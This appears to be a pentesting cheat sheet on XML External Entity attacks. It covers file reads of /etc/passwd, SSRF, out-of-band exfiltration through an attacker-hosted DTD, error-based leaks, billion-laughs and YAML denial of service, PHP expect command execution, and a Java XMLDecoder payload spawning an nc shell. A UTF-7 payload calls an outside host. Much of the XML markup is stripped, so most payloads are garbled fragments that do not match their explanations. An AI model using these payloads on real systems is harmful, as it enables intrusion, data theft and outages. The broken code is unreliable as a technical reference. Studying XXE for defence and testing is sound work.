# XXE - XEE - XML External Entity An XML External Entity attack is a type of attack against an application that parses XML input. ## XML Basics **Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)\*\*\*\* ### What is XML? XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format \(the "X" in "AJAX" stands for "XML"\). But its popularity has now declined in favor of the JSON format. ### What are XML entities? XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities `<` and `>` represent the characters `<` and `>`. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data. ### What are XML elements? Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example: * `` Means that any object could be inside the parent `` * <!ELEMENT stockCheck EMPTY> Means that it should be empty `` * <!ELEMENT stockCheck \(productId,storeId\)> Declares that `` can have the children `` and `` ### What is document type definition? The XML document type definition \(DTD\) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional `DOCTYPE` element at the start of the XML document. The DTD can be fully self-contained within the document itself \(known as an "internal DTD"\) or can be loaded from elsewhere \(known as an "external DTD"\) or can be hybrid of the two. ### What are XML custom entities? XML allows custom entities to be defined within the DTD. For example: ` ]>` This definition means that any usage of the entity reference `&myentity;` within the XML document will be replaced with the defined value: "`my entity value`". ### What are XML external entities? XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the `SYSTEM` keyword and must specify a URL from which the value of the entity should be loaded. For example: ` ]>` The URL can use the `file://` protocol, and so external entities can be loaded from file. For example: ` ]>` XML external entities provide the primary means by which [XML external entity attacks](https://portswigger.net/web-security/xxe) arise. ### What are XML Parameter entities? Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name: `` And second, parameter entities are referenced using the percent character instead of the usual ampersand: `%myparameterentity;` This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows: ` %xxe; ]>` This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful. ## Main attacks [Most of these attacks were tasted using the awesome Portswiggers XEE labs: https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) ### New Entity test In this attack I'm going to test if a simple new ENTITY declaration is working ```markup ]> &toreplace; 1 ``` ![](../.gitbook/assets/image%20%2820%29.png) ### Read file Lets try to read `/etc/passwd` in different ways. For Windows you could try to read: `C:\windows\system32\drivers\etc\hosts` In this first case notice that SYSTEM "_**file:///**etc/passwd_" will also work. ```markup ]> &example; ``` ![](../.gitbook/assets/image%20%28264%29.png) This second case should be useful to extract a file if the web server is using PHP \(Not the case of Portswiggers labs\) ```markup ]> &example; ``` In this third case notice we are declaring the `Element stockCheck` as ANY ```markup ]> &file; 1 ``` ![](../.gitbook/assets/image%20%2832%29.png) ### SSRF An XXE could also bu used to abuse a SSRF inside a cloud ```markup ]> &xxe;1 ``` ### Blind SSRF Using the **previously commented technique** you can make the server access a server you control to show it's vulnerable. But, if that's not working, maybe is because **XML entities aren't allowed**, in that cause you could try using **XML parameter entities**: ```markup %xxe; ]> 3;1 ``` ### "Blind" SSRF - Exfiltrate data out-of-band **In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request \(for multi-line files you could try to ex-filtrate it via** _**ftp://**_**\). This explanation as taken from** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.** An example of a malicious DTD to exfiltrate the contents of the `/etc/hostname` file is as follows: ```markup "> %eval; %exfiltrate; ``` This DTD carries out the following steps: * Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file. * Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `exfiltrate`. The `exfiltrate` entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the `file` entity within the URL query string. * Uses the `eval` entity, which causes the dynamic declaration of the `exfiltrate` entity to be performed. * Uses the `exfiltrate` entity, so that its value is evaluated by requesting the specified URL. The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL: `http://web-attacker.com/malicious.dtd` Finally, the attacker must submit the following XXE payload to the vulnerable application: ```markup %xxe;]> 3;1 ``` This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server. ### Error Based\(External DTD\) **In this case we are going to make the server loads a malicious DTD that will show the content of a file inside an error message \(this is only valid if you can see error messages\).** [**Example from here.**](https://portswigger.net/web-security/xxe/blind)\*\*\*\* You can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using a malicious external DTD as follows: ```markup "> %eval; %error; ``` This DTD carries out the following steps: * Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file. * Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `error`. The `error` entity will be evaluated by loading a nonexistent file whose name contains the value of the `file` entity. * Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed. * Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file. Invoke the external DTD error with: ```markup %xxe;]> 3;1 ``` And you should see the contents of the file inside error message of the response of the web server. ![](../.gitbook/assets/image%20%28143%29.png) _**Please notice that external DTD allows us to include one entity inside the second \(`eval`\), but it is prohibited in the internal DTD. Therefore, it doesn't work to force the error without using an external DTD \(usually\).**_ ### **Error Based \(local DTD\)** So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** \(external connections aren't available\)?. [Information from here](https://portswigger.net/web-security/xxe/blind). In this situation, it might still be possible to **trigger error messages containing sensitive data**, due to a loophole in the XML language specification. If a document's **DTD uses a hybrid of internal and external DTD** declarations, then the **internal DTD can redefine entities that are declared in the external DTD**. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed. This means that an attacker can employ the **error-based XXE technique from within an internal DTD**, provided the XML parameter entity that they use is **redefining an entity that is declared within an external DTD**. Of course, if out-of-band connections are blocked, then the external DTD cannot be loaded from a remote location. Instead, it needs to be an **external DTD file that is local to the application server**. _Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data._ For example, suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. An attacker can trigger an XML parsing error message containing the contents of the `/etc/passwd` file by submitting a hybrid DTD like the following: ```markup "> %eval; %error; '> %local_dtd; ]> ``` This DTD carries out the following steps: * Defines an XML parameter entity called `local_dtd`, containing the contents of the external DTD file that exists on the server filesystem. * Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages) that was already described, for triggering an error message containing the contents of the `/etc/passwd` file. * Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message. **Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso` ```markup "> %eval; %error; '> %local_dtd; ]> 3;1 ``` ![](../.gitbook/assets/image%20%2868%29.png) As this technique uses an **internal DTD you need to find a valid one first**. You could do this **installing** the same **OS / Software** the server is using and **searching some default DTDs**, or **grabbing a list** of **default DTDs** inside systems and **check** if any of them exists: ```markup %local_dtd; ]> ``` ### DoS #### Billion Laugh Attack ```markup ]> &a4; ``` #### Yaml Attack ```markup a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` ## Hidden XXE Surfaces ### XInclude [From here.](https://portswigger.net/web-security/xxe) Some applications **receive client-submitted data, embed it on the server-side into an XML document, and then parse the document**. An example of this occurs when client-submitted data is placed into a **backend SOAP request**, which is then processed by the backend SOAP service. In this situation, you cannot carry out a classic XXE attack, because **you don't control the entire XML** document and so cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead. `XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. To perform an `XInclude` attack, you need to reference the `XInclude` namespace and provide the path to the file that you wish to include. For example: ```markup productId=&storeId=1 ``` ### SVG - File Upload [From here.](https://portswigger.net/web-security/xxe) Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG. For example, an application might allow users to **upload images**, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the **image processing library that is being used might support SVG images**. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities. ```markup ``` You could also try to **execute commands** using the PHP "expect" wrapper: ```markup ``` **Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.** ### **PDF - File upload** Read the following post to **learn how to exploit a XXE uploading a PDF** file: {% page-ref page="file-upload/pdf-upload-xxe-and-cors-bypass.md" %} ### Content-Type: From x-www-urlencoded to XML If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. ```markup POST /action HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 7 foo=bar ``` ```markup POST /hackingman HTTP/1.0 Content-Type: text/html Content-Length: 7 3301 ``` ### Content-Type: From JSON to XEE To change the request you could use a Burp Extension named “**Content Type Converter**“. [Here](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) you can find this example: ```markup Content-Type: application/json;charset=UTF-8 {"root": {"root": { "firstName": "Avinash", "lastName": "", "country": "United States", "city": "ddd", "postalCode": "ddd" }}} ``` ```markup Content-Type: application/xml;charset=UTF-8 ]> &xxe; United States ddd ddd ``` Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2). ## Other bypasses ### Base64 ```markup %init; ]> ``` This only work if the XML server accepts the `data://` protocol. ### UTF-7 You can use the [**"Encode Recipe**" of cyberchef here ](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7%20%2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to transform to UTF-7. ```markup +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4- ``` ```markup +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` ## PHP Wrappers ### Base64 **Extract** _**index.php**_ ```markup ]> ``` #### **Extract external resource** ```markup ]> ``` ### Remote code execution **If PHP "expect" module is loaded** ```markup ]> &xxe; mypass ``` ## **SOAP - XEE** ```markup %dtd;]>]]> ``` ## RSS - XEE Valid XML with RSS format to exploit an XXE vulnerability. ### Ping back Simple HTTP request to attackers server ```markup /rssXXE" >]> XXE Test Blog http://example.com/ XXE Test Blog Mon, 02 Feb 2015 00:00:00 -0000 &xxe; http://example.com Test Post author@example.com Mon, 02 Feb 2015 00:00:00 -0000 ``` ### Read file ```markup ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ### Read source code Using PHP base64 filter ```markup ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ## Java XMLDecoder XEE to RCE XMLDecoder is a Java class that creates objects based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method **readObject**, he will instantly gain code execution on the server. ### Using Runtime\(\).exec\(\) ```markup /usr/bin/nc -l -p 9999 -e /bin/sh ``` ### ProcessBuilder ```markup /usr/bin/nc -l -p 9999 -e /bin/sh ``` ## Tools {% embed url="https://github.com/luisfontes19/xxexploiter" %} ## More resources [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf) [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html) Extract info via HTTP using own external DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/) [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection) [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4) [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9) [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)